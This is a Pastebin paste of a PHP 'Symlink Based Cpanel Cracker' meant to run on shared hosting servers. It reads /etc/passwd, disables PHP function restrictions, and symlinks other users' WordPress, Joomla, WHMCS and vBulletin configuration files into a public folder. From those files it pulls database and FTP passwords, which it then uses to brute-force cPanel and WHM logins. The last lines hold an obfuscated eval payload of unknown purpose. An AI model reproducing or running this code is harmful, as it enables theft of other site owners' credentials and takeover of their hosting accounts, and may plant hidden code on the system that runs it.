SHARE
TWEET

Untitled

bajili Jun 12th, 2019 117 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3.  
  4. $head = '
  5.  
  6. <html>
  7. <head>
  8. </script>
  9. <title>--==[[ Fvck!!!,Symlink Based Cpanel Cracker kaMtiEz]]==--</title>
  10. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  11.  
  12. <STYLE>
  13. body {
  14. font-family: Tahoma
  15. }
  16. tr {
  17. BORDER: dashed 2px #333;
  18. color: #FFF;
  19. }
  20.  
  21. .table1 {
  22. BORDER: 0px Black;
  23. BACKGROUND-COLOR: Black;
  24. color: #FFF;
  25. }
  26. .td1 {
  27. BORDER: 0px;
  28. BORDER-COLOR: #333333;
  29. font: 7pt Verdana;
  30. color: #130ce3;
  31. }
  32. .tr1 {
  33. BORDER: 0px;
  34. BORDER-COLOR: #333333;
  35. color: #FFF;
  36. }
  37. table {
  38. BORDER: dashed 2px #333;
  39. BORDER-COLOR: #333333;
  40. BACKGROUND-COLOR: Black;
  41. color: #FFF;
  42. }
  43. input {
  44. border : solid 3px ;
  45. border-color : #333;
  46. BACKGROUND-COLOR: #8a87e6;
  47. font: 11pt Verdana;
  48. color: #333;
  49. }
  50. select {
  51. BORDER-RIGHT: Black 1px solid;
  52. BORDER-TOP: #DF0000 1px solid;
  53. BORDER-LEFT: #DF0000 1px solid;
  54. BORDER-BOTTOM: Black 1px solid;
  55. BORDER-color: #FFF;
  56. BACKGROUND-COLOR: Black;
  57. font: 8pt Verdana;
  58. color: Red;
  59. }
  60. submit {
  61. BORDER: buttonhighlight 2px outset;
  62. BACKGROUND-COLOR: Black;
  63. width: 30%;
  64. color: #FFF;
  65. }
  66. textarea {
  67. border : dashed 1px #333;
  68. BACKGROUND-COLOR: Black;
  69. font: Fixedsys bold;
  70. color: #999;
  71. }
  72. BODY {
  73. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  74. margin: 1px;
  75. color: Red;
  76. background-color: Black;
  77. }
  78. .main {
  79. margin : -287px 0px 0px -490px;
  80. BORDER: dashed 1px #333;
  81. BORDER-COLOR: #333333;
  82. }
  83. .tt {
  84. background-color: Black;
  85. }
  86.  
  87. A:link {
  88. COLOR: #8a87e6; TEXT-DECORATION: none
  89. }
  90. A:visited {
  91. COLOR: #8a87e6; TEXT-DECORATION: none
  92. }
  93. A:hover {
  94. color: Red; TEXT-DECORATION: none
  95. }
  96. A:active {
  97. color: Red; TEXT-DECORATION: none
  98. }
  99. </STYLE>
  100. <script language=\'javascript\'>
  101. function hide_div(id)
  102. {
  103. document.getElementById(id).style.display = \'none\';
  104. document.cookie=id+\'=0;\';
  105. }
  106. function show_div(id)
  107. {
  108. document.getElementById(id).style.display = \'block\';
  109. document.cookie=id+\'=1;\';
  110. }
  111. function change_divst(id)
  112. {
  113. if (document.getElementById(id).style.display == \'none\')
  114. show_div(id);
  115. else
  116. hide_div(id);
  117. }
  118. </script>'; ?>
  119. <html>
  120. <head>
  121. <?php
  122. echo $head ;
  123. echo '
  124.  
  125. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  126.  
  127.  
  128.  
  129. <td width="100%" align=center valign="top" rowspan="1"><font color=#ffffff size=5 face="comic sans ms"><b>--==[[ kaMtiEz ]]==--</font><br>
  130. <font color=#ffffff size=5 face="comic sans ms"><b>--==[[ Symlink Based</font><font color=#8a87e6 size=5 face="comic sans ms"><b> CPanel Cracker By</font><font color=#130ce3 size=5 face="comic sans ms"><b> Team GG ]]==--</font> <div class="hedr">
  131.  
  132. <td height="10" align="left" class="td1"></td></tr><tr><td
  133. width="100%" align="center" valign="top" rowspan="1"><font
  134. color="red" face="comic sans ms"size="1"><b>
  135. <font color=#ffffff>
  136. ####################################################</font><font color=#8a87e6>#####################################################</font><font color=#130ce3>####################################################</font><br><font color=#8a87e6>-==[[Greetz to]]==--</font><br><font color=#ffffff>PT. GUDANG GARAM, DJI SAM SOE, DJINGGO, CRICKET, ASBAK, TOSHIBA, AQUA, SMARTFREN, BRI, NOKIA<br>
  137.  
  138. <font color=#8a87e6>--==[[Dedicated to]]==--</font>
  139. <br># My Father and my Ex Teacher #<br><font color=#8a87e6>--==[[Interface Desgined By]]==--</font><br><font color=red>kaMtiEz :D</font><br><font color=#ffffff>
  140. ####################################################</font><font color=#8a87e6>#####################################################</font><font color=#130ce3>####################################################</font>
  141.  
  142. </table>
  143. </table> <div align=center><font color=#ffffff font size=5><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%"><span class="footerlink">Contac Me : Indokamtiez@yahoo.co.id</span></marquee><br></font></div><div align=center><font color=#ffffff font size=4>--==[[ kaMtiEz Featuring PT GUDANG GARAM]]==--</font>
  144.  
  145. ';
  146.  
  147. ?>
  148. <body bgcolor=black><div align=center><font color=red size=2 face="comic sans ms">
  149. <form method=post>
  150. <input type=submit name=ini value="Generate PHP.ini" /></form>
  151. <?php
  152. if(isset($_POST['ini']))
  153. {
  154.  
  155. $r=fopen('php.ini','w');
  156. $rr=" disable_functions=none ";
  157. fwrite($r,$rr);
  158. $link="<a href=php.ini><font color=#8a87e6 size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
  159. echo $link;
  160.  
  161. }
  162. ?>
  163. <p>\\\\\\\\\\\\\\\\\\\\\\\\ Symlink based cpanel cracking wala jugaad XD ///////////////////////
  164. <?php
  165. //////////////////////////////////////
  166. /////    mass symlink       ////////
  167. //////////////////////////////////////
  168. ?>
  169. <form method=post>
  170. <input type=submit name="usre" value="click to Extract usernames and mass symlink" /></form>
  171.  
  172.  
  173.  
  174.  
  175. <?php
  176. if(isset($_POST['usre'])){
  177. ?><form method=post>
  178. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
  179. foreach($users as $user)
  180. {
  181. $str=explode(":",$user);
  182. echo $str[0]."\n";
  183. }
  184.  
  185. ?></textarea><br><br>
  186. <input type=submit name=su value="Klik disini untuk MEMBANTAI" /></form>
  187. <?php } ?>
  188. <?php
  189. error_reporting(0);
  190. echo "<font color=red size=2 face=\"comic sans ms\">";
  191. if(isset($_POST['su']))
  192. {
  193.  
  194. $dir=mkdir('IcA',0777);
  195. $r = " Options all \n DirectoryIndex ICA.html \n Require None \n Satisfy Any";
  196. $f = fopen('IcA/.htaccess','w');
  197.  
  198. fwrite($f,$r);
  199. $consym="<a href=IcA/><font color=#8a87e6 size=3 face=\"comic sans ms\">configuration files</font></a>";
  200. echo "<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  201.  
  202. $usr=explode("\n",$_POST['user']);
  203.  
  204. foreach($usr as $uss )
  205. {
  206. $us=trim($uss);
  207.  
  208. $r="IcA/";
  209. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  210. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  211. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  212. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  213. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  214. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  215. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  216. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  217. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  218. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  219. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  220. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  221. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  222. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  223. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  224. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  225. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  226. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  227. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  228. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  229. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  230. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  231. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  232. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  233. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  234. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  235. }
  236. }
  237. ?>
  238. <?php
  239. //////////////////////////////////////
  240. /////password grabbing section////////
  241. //////////////////////////////////////
  242. ?>
  243.  
  244. <form method=post>
  245.         <input type=submit name=select value="Memilih Config Untuk Di Tusbol">
  246.         </form>
  247.        
  248.     <?php
  249.     if(isset($_POST['select']))
  250.     {
  251.         ?><div align=center>
  252.     <font color=#ffffff size=2 face="comic sans ms">Cek Config Untuk Mencari Password <table width=30% >
  253.      <tr>
  254.          <td align=right width=50%>
  255.              <br>
  256.  <font color=red size=3>
  257.      wordpress => <br>
  258.      joomla => <br>
  259.      whmcs =><br>
  260.      VBulletin => <br>
  261.      unknown => <br>
  262.      ftp(joomla) => <br>
  263.      <br>
  264.  </td>
  265.  <td align=left >
  266.      <form method="post"><br>
  267. <input type="checkbox" name="config[]" value="wp"><br>
  268. <input type="checkbox" name="config[]" value="joomla"><br>
  269. <input type="checkbox" name="config[]" value="whmcs"><br>
  270. <input type="checkbox" name="config[]" value="vb"><br>
  271. <input type="checkbox" name="config[]" value="other"><br>
  272. <input type="checkbox" name="config[]" value="jftp"><br>
  273. </td>
  274.      </tr>
  275.            </table><br>
  276. <input type="submit" name=sm value="lanjutkan untuk membantai" />
  277. </form>
  278. <p>
  279.     <?php
  280. }
  281. ?>
  282. <?php
  283.  
  284. set_time_limit(0);
  285.  
  286. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  287. {
  288.  
  289. $ar0=explode($marqueurDebutLien, $text);
  290. $ar1=explode($marqueurFinLien, $ar0[1]);
  291. $ar=trim($ar1[0]);
  292. return $ar;
  293. }
  294.  
  295. function data($lu)
  296. {
  297.     $ch = curl_init();
  298.  
  299. curl_setopt($ch, CURLOPT_URL, $lu);
  300. curl_setopt($ch, CURLOPT_HEADER, 1);
  301. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  302. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  303. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  304. $result['EXE'] = curl_exec($ch);
  305. curl_close($ch);
  306. return $result['EXE'];
  307.    
  308. }
  309.  
  310.  
  311.  
  312.       if(isset($_POST['sm']))
  313.         {
  314. ////////////////
  315. ///file opener//
  316. ////////////////   
  317. $ffile=fopen('r.txt','a+');
  318.  
  319. //////////////////////
  320. //symlink directory///
  321. //////////////////////
  322.  $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/IcA/";
  323. $re=$r;
  324.  
  325. ////////////////////////
  326. ///username extractor///
  327. ////////////////////////
  328. if(!empty($_POST['config']))
  329.                 {
  330.  
  331. $users=file("/etc/passwd");
  332. foreach($users as $user)
  333. {
  334.  
  335. $str=explode(":",$user);
  336. $usersss=$str[0];
  337.  
  338.  
  339.              
  340.                    foreach($_POST['config'] as $check)
  341.                      {
  342.  
  343. ////////////////
  344. ///wordpress////
  345. ////////////////
  346.                        if($check == "wp")
  347.                          {
  348.                            $wpc=array("..wp-config","..word-wp","..wpblog");
  349.  
  350.                         foreach($wpc as $wpcon)
  351.                           {
  352.                                $finalurl=$re.$usersss.$wpcon;
  353.                               $content=data($finalurl);
  354.                              
  355.                               if($content && preg_match('/table_prefix/i',$content))
  356.                                  {
  357.  
  358. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website cms is wordpress </font></td></tr></table>";
  359.  
  360.                                  echo "mysql server password ==> ". $dbp=entre2v2($content,"DB_PASSWORD', '","');");
  361.                                     if(!empty($dbp))
  362.                                             $pass=$dbp."\n";
  363.                                           fwrite($ffile,$pass);
  364.  
  365.                                   }
  366.  
  367.  
  368.  
  369.                           }
  370.                        
  371.                      }
  372. ////////////
  373. // joomla //  
  374. ////////////                  
  375.                      
  376.                      
  377.                      if($check == "joomla")
  378.                      {
  379.                         $joomlac=array("..joomla-or-whmcs","..joomla");
  380.                          foreach($joomlac as $joomlacon)
  381.                           {
  382.                               $finalurl=$re.$usersss.$joomlacon;
  383.                               $content=data($finalurl);
  384.                              
  385.                               if($content && preg_match('/dbprefix/i',$content))
  386.                                  {
  387.  
  388. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's  website cms is joomla </font></td></tr></table>";
  389.  
  390.                                  echo "mysql server password ==> ". $dbp=entre2v2($content,"password = '","';");
  391.                                     if(!empty($dbp))
  392.                                             $pass=$dbp."\n";
  393.                                           fwrite($ffile,$pass);
  394.  
  395.                                   }
  396.  
  397.  
  398.  
  399.                           }
  400.                          
  401.                          
  402.                          }
  403. ///////////////
  404. ////whmcs /////
  405. ///////////////  
  406.                  
  407.                           if($check == "whmcs")
  408.                          {
  409.                          $whmcsc=array("..joomla-or-whmcs","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  410.                          foreach($whmcsc as $whmcscon)
  411.                           {
  412.                               $finalurl=$re.$usersss.$whmcscon;
  413.                               $content=data($finalurl);
  414.                              
  415.                               if($content && preg_match('/cc_encryption_hash/i',$content))
  416.                                  {
  417.  
  418. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website whmcs bhaiyu xD </font></td></tr></table>";
  419.  
  420.                                  echo "mysql server password ==> ". $dbp=entre2v2($content,"db_password = '","';");
  421.                                     if(!empty($dbp))
  422.                                             $pass=$dbp."\n";
  423.                                           fwrite($ffile,$pass);
  424.  
  425.                                   }
  426.                           }
  427.                          }
  428. /////////////////
  429. ///VBulletin////
  430. ////////////////
  431.                             if($check == "vb")
  432.                          {
  433.                          $vbc=array("..vbinc","..vb");
  434.                          foreach($vbc as $vbcon)
  435.                           {
  436.                               $finalurl=$re.$usersss.$vbcon;
  437.                               $content=data($finalurl);
  438.                              
  439.                               if($content && preg_match('/admincpdir/i',$content))
  440.                                  {
  441.  
  442. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website cms is vbulletin </font></td></tr></table>";
  443.  
  444.                                  echo "mysql server password ==> ". $dbp=entre2v2($content,"password'] = '","';");
  445.                                     if(!empty($dbp))
  446.                                             $pass=$dbp."\n";
  447.                                           fwrite($ffile,$pass);
  448.  
  449.                                   }
  450.                           }
  451.                          }
  452. /////////////////
  453. ///joomla ftp////
  454. ////////////////                         
  455.                           if($check == "jftp")
  456.                      {
  457.                         $joomlac=array("..joomla-or-whmcs","..joomla");
  458.                          foreach($joomlac as $joomlacon)
  459.                           {
  460.                               $finalurl=$re.$usersss.$joomlacon;
  461.                               $content=data($finalurl);
  462.                              
  463.                               if($content && preg_match('/dbprefix/i',$content))
  464.                                  {
  465.  
  466. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's  website cms is joomla </font></td></tr></table>";
  467.  
  468.                                  $dbp=entre2v2($content,"ftp_pass = '","';");
  469.                                  $dbu=entre2v2($content,"ftp_user = '","';");
  470.                                     if(!empty($dbp))
  471.                                     echo "ftp  user is ==> ". $dbu=entre2v2($content,"ftp_user = '","';");
  472.                                     echo "<br>ftp  password is ==> ". $dbp=entre2v2($content,"ftp_pass = '","';");
  473.                                    
  474.                                             $pass=$dbu." ".$dbp."\n";
  475.                                           fwrite($ffile,$pass);
  476.  
  477.                                   }
  478.  
  479.  
  480.  
  481.                           }
  482.                          
  483.                          
  484.                          }
  485. ////////////////
  486. // other cms ///
  487. ///////////////                      
  488.                              if($check == "other")
  489.                          {
  490.                          $otherc=array("..config","..admin-conf");
  491.                          foreach($otherc as $othercon)
  492.                           {
  493.                               $finalurl=$re.$usersss.$othercon;
  494.                               $content=data($finalurl);
  495.                              
  496.                               if($content && preg_match('/DB_DATABASE/i',$content))
  497.                                  {
  498.  
  499. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss  </font></td></tr></table>";
  500.  
  501.                                  echo "mysql server password ==> ". $dbp=entre2v2($content,"DB_PASSWORD', '","');");
  502.                                     if(!empty($dbp))
  503.                                             $pass=$dbp."\n";
  504.                                           fwrite($ffile,$pass);
  505.  
  506.                                   }
  507. elseif($content && preg_match('/dbpass/i',$content))
  508. {
  509.  
  510. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  511.  
  512. echo $db=entre2v2($content,"dbpass = '","';");
  513. if(!empty($db))
  514. $pass=$db."\n";
  515. fwrite($ffile,$pass);
  516. }
  517. elseif($content && preg_match('/dbpass/i',$content))
  518. {
  519.  
  520. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss  </font></td></tr></table>";
  521.  
  522. echo $db=entre2v2($content,"dbpass = '","';");
  523. if(!empty($db))
  524. $pass=$db."\n";
  525. fwrite($ffile,$pass);
  526.  
  527. }
  528. elseif($content && preg_match('/dbpass/i',$content))
  529. {
  530.  
  531. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  532.  
  533. echo $db=entre2v2($content,"dbpass = \"","\";");
  534. if(!empty($db))
  535. $pass=$db."\n";
  536. fwrite($ffile,$pass);
  537. }
  538.                                
  539.                                  
  540.                                  
  541.                                  
  542.                           }
  543.                          }
  544.                          
  545.                          
  546.                          
  547.                  }
  548.              }
  549.               }
  550.              else{
  551.                   echo "<p>aapne pani jayada pee liya h =)), aap nashe may ho bhaiyu, please checkmark config files :P ";
  552.                  }
  553.        
  554.      }
  555. ?>
  556.  
  557.  
  558.  
  559. <?php
  560. /////////////////////////////////
  561. /////   cpanel cracker    ///////
  562. /////////////////////////////////
  563. ?>
  564.  
  565.  
  566. <form method=post>
  567. <input type=submit name=cpanel value="Auto username/password loading cpanel cracker"><p>
  568. <?php
  569.  
  570. if(isset($_POST['cpanel']))
  571. {
  572. ?>
  573. <form method=post><div align=center><table>
  574. want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
  575. <option name="op" value="whm">WHMPanel</option></table><p>
  576. <textarea style="background:black;color:#8a87e6" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  577. foreach($users as $user)
  578. {
  579. $str=explode(":",$user);
  580. echo $str[0]."\n";
  581. }
  582.  
  583. ?></textarea><textarea style="background:black;color:#8a87e6" rows=20 cols=25 name=passwords >
  584. <?php
  585.  
  586. $d=getcwd()."/r.txt";
  587. $pf=file($d);
  588. foreach($pf as $rt)
  589. {
  590. $str=explode('\n',$rt);
  591. echo trim($str[0])."\n";
  592. } ?></textarea><p>
  593. <input type=submit name=cpanelcracking value="tonjok q=_=p"></form>
  594. <?php
  595. }
  596. ?>
  597.  
  598.  
  599.  
  600.  
  601. <?php
  602. error_reporting(0);
  603. $connect_timeout=5;
  604. set_time_limit(0);
  605.  
  606. $userl=$_POST['usernames'];
  607. $passl=$_POST['passwords'];
  608. $attack=$_POST['op'];
  609. $target = "localhost";
  610.  
  611. if(isset($_POST['cpanelcracking']))
  612. {
  613. if($userl!=="" && $passl!=="")
  614. {
  615. if($_POST["op"]=="cp")
  616. {
  617. $cracked=$_POST['crack'];
  618. @fopen($cracked,'a');
  619. echo "bhai ji ^_^ ......now we are attacking cpanels....please wait till the end of process \n";
  620.  
  621.  
  622. }
  623. elseif($_POST["op"]=="whm")
  624. {
  625. @fopen($cracked,'a');
  626. echo "bhai ji ^_^ ......now we are attacking WHM panel....please wait till the end of process";
  627.  
  628. }
  629.  
  630. function cpanel($host,$user,$pass,$timeout){
  631. $ch = curl_init();
  632. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  633. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  634. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  635. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  636. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  637. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  638. $data = curl_exec($ch);
  639. if ( curl_errno($ch) == 0 ){
  640. echo "<table width=100% ><tr><td align=center><b><font color=#8a87e6 size=2>==================================</font><font color=red size=2> $user </font><font color=#8a87e6 size=2>cracked with </font><font color=red size=2> $pass </font> <font color=#8a87e6 size=2>==================================</font></b></td></tr></table>";
  641.  
  642.  
  643. }
  644.  
  645. curl_close($ch);}
  646.  
  647. $userlist=explode("\n",$userl);
  648. $passlist=explode("\n",$passl);
  649.  
  650. if ($attack == "cp")
  651. {
  652. foreach ($userlist as $user) {
  653. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
  654. $finaluser = trim($user);
  655. foreach ($passlist as $password ) {
  656. $finalpass = trim($password);
  657.  
  658.  
  659. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  660.  
  661. }
  662. }
  663.  
  664. }
  665.  
  666. function whm($host,$user,$pass,$timeout){
  667. $ch = curl_init();
  668. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  669. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  670. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  671. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  672. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  673. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  674. $data = curl_exec($ch);
  675. if ( curl_errno($ch) == 0 ){
  676. echo "<table width=100% ><tr><td align=center><b><font color=#8a87e6 size=2>==================================</font><font color=red size=2> $user </font><font color=#8a87e6 size=2>cracked with </font><font color=red size=2> $pass </font> <font color=#8a87e6 size=2>==================================</font></b></td></tr></table>";
  677.  
  678.  
  679.  
  680.  
  681. }
  682.  
  683.  
  684. curl_close($ch);}
  685. $userlist=explode("\n",$userl);
  686. $passlist=explode("\n",$passl);
  687.  
  688. if ($attack == "whm")
  689. {
  690. foreach ($userlist as $user) {
  691. echo "<table width=80% ><tr><td align=center><b><font color=#8a87e6 size=2>user under attack is $user </font></td></tr></table>";
  692. $finaluser = trim($user);
  693. foreach ($passlist as $password ) {
  694. $finalpass = trim($password);
  695.  
  696. whm($target,$finaluser,$finalpass,$connect_timeout);
  697. }
  698. }
  699. }
  700. }
  701. elseif($userl=="")
  702. {
  703. echo "what are you doing bhai ji :( , you have left userlist field empty";
  704.  
  705. }
  706. elseif($passl=="")
  707. {
  708.  
  709. echo "bhai ji :( ... please put passwords in paasword list field";
  710. }
  711. }
  712. ?>
  713. <?php
  714. $x='AkbetSDlUI~ULLJVqNFiFoRh4gsBKJYlCyJoPkWAWc6pkXOKpry5nXi6JeAS3tEzJ7yLIvs0K3ETIrsKQFNzM3EzRaw4tDJAHBIbEulIMTZ2gFr6hEs~eEfAhEiHqHdQuGWQuGc8qIGgyQVu4VRr0UTsF8CiogMKVBbVNx8SJL14';$b=strrev('edoced_46esab');$g=$b('Z3ppbmZsYXRl');$r=$b('c3RyX3JlcGxhY2U=');eval($g($b(strrev($r($b('fg=='),$b('Lw=='),$x)))));$xx='41LJS8xNVbBVKMgoiC8FsTU0rRV4uVQygGIq8cGuQWGuQdHqHiEhAfEe~sEh6rFg2ZTMIluEbIBHAJDt4waRzE3MzNFQKsrITE3K0svILy7JzEt3SAeJ6iXn5yrpKOXkp6cWAWkPoJyClYJKBsg4hRoFiFNqVJLLU~IUlDStebkA';
  715. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top